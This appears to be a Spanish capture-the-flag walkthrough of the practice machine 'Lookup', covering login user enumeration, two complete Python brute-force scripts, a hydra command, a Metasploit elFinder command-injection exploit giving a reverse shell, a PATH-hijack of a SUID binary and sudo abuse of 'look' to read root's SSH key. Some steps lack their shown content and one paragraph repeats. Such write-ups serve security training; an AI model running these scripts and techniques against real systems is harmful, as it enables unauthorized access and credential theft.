Lookup(Fuerza bruta en login)

Evidencia de un usuario inexistente

Nombre de usuario o contraseña incorrectos. Inténtalo de nuevo. Redireccionando en 3 segundos.

Evidencia de un usuario existente

Contraseña incorrecta. Inténtalo de nuevo. Redireccionando en 3 segundos.

Esto nos llama la atención, por lo que el siguiente paso deberá ser la enumeración de usuarios registrados en la base de datos, para posteriormente realizar ataques automatizados de contraseñas y ganar acceso al aplicativo.

Creamos un pequeño script de Python para realizar la enumeración de usuarios existente:

• Cambiar diccionario

• Cambiar dominio

#!/usr/bin/python3
# -*- coding: utf-8 -*-

import requests, re, time, sys
from random import randint

url = "http://lookup.thm/login.php"
headers_data = ''

if __name__ == '__main__':
        
        s = requests.session()

        print("[*] User bruteforce starting...")

        fp = open('/opt/SecLists/Usernames/Names/names.txt', errors='ignore')
        for username in fp.readlines():
                r = s.get(url, verify=False)

                post_data = {
                        'username': '%s' % username.rstrip(),
                        'password': '123456'
                }

                r = s.post(url, data=post_data, headers=headers_data, verify=False)
        
                if "Wrong password." in r.text:
                        print("[+] User found!!!: %s" % username)
                
        fp.close()

Una vez enumerado el usuario “Jose”, retocamos un poco el script y lo volvemos a lanzar para adivinar la contraseña por fuerza bruta:

#!/usr/bin/python3
# -*- coding: utf-8 -*-

import requests, re, time, sys
from random import randint

url = "http://lookup.thm/login.php"
headers_data = ''

if __name__ == '__main__':

        s = requests.session()

        print("[*] Bruteforce starting...")

        fp = open('/opt/SecLists/Usernames/Names/names.txt', errors='ignore')
        for password in fp.readlines():
                r = s.get(url, verify=False)

                post_data = {
                        'username': 'jose',
                        'password': '%s' % password.rstrip()
                }

                r = s.post(url, data=post_data, headers=headers_data, verify=False)

                if "Wrong password." not in r.text:
                        print("[+] Password found!!!: %s" % password)

        fp.close()

O----

Podemos usar hydra:

hydra -l admin -P /usr/share/wordlists/rockyou.txt lookup.thm http-post-form "/login.php:username=^USER^&password=^PASS^:Wrong password. Please try again."

Notas importantes:

1. Mensaje de error exacto:

   • Asegúrate de incluir exactamente el mensaje de error: Wrong password. Please try again.

   • Es sensible a mayúsculas, minúsculas y espacios, así que cualquier diferencia hará que Hydra no funcione correctamente.

GIHUB:

https://github.com/Marco-Anonimous/Fuerza_brutagithub.com

Una vex se tiene las credenciales se ingresa al login;

• Miramos la version y es la elFinder 2.1.47

numeré la existencia de otro exploit de Metasploit, este último si que funcionó:

• elFinder PHP Connector < 2.1.48 - ‘exiftran’ Command Injection (Metasploit)

msfconsole
use unix/webapp/elfinder_php_connector_exiftran_cmd_injection
show options
Le entregamos la ip y el dominio

Esto nos genera la revershell:

www-data@lookup:/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@lookup:/tmp$ 

Mirando el archivo /etc/passwd, vemos que hay un usuario “think” y root.

Podemos echar un vistazo al directorio de inicio de think:

Aquí hay un archivo .passwords que podría ser interesante, pero no tenemos permiso para leerlo.

Busquemos binarios SUID:

find / -perm /4000 2>/dev/null

El binario /usr/sbin/pwm me llama la atención porque no está allí de forma predeterminada en los hosts Linux.

Este archivo es propiedad de root:

Veamos qué pasa cuando lo ejecutamos:

Interesante. Este binario parece ejecutar el comando “id”, luego extrae el nombre de usuario y lo coloca en “/home/<username>/.passwords” e intenta hacer algo con él.

Si el comando “id” no se especifica con su ruta completa (/bin/id), se encuentra y se ejecuta a través de la variable PATH en nuestro entorno.

Interesante. Este binario parece ejecutar el comando “id”, luego extrae el nombre de usuario y lo coloca en “/home/<username>/.passwords” e intenta hacer algo con él.

Si el comando “id” no se especifica con su ruta completa (/bin/id), se encuentra y se ejecuta a través de la variable PATH en nuestro entorno.

Intentemos engañar al programa para que ejecute un comando “ID” diferente, uno que daría como resultado que el nombre de usuario “think” se extraiga de la salida.

Podemos agregar /tmp a nuestra ruta:

Y ahora crea /tmp/id con el siguiente contenido:

Intentemos volver a ejecutar “pwm”:

¡Bingo!, engañamos al binario para que extrajera “think” como nombre de usuario, ¡y obtuvimos lo que parece ser una lista de contraseñas!

Guardemos esa lista en un archivo en nuestro kali e intentemos forzar brutamente "pensar":

Escalada de privilegios (parte 2)

Al verificar los privilegios sudo de think, podemos ver que puede ejecutar el comando “look” como root:

Podemos consultar GTFOBins para ver si podemos explotar esto de alguna manera:

Según GTFOBins, podemos usar este binario para leer archivos en el sistema, y ​​como podemos ejecutarlo como root, ¡podemos leer cualquier archivo en el sistema!

La victoria más rápida sería la clave SSH privada del root:

Podemos guardar la clave en un archivo en nuestra máquina Kali e iniciar sesión como root: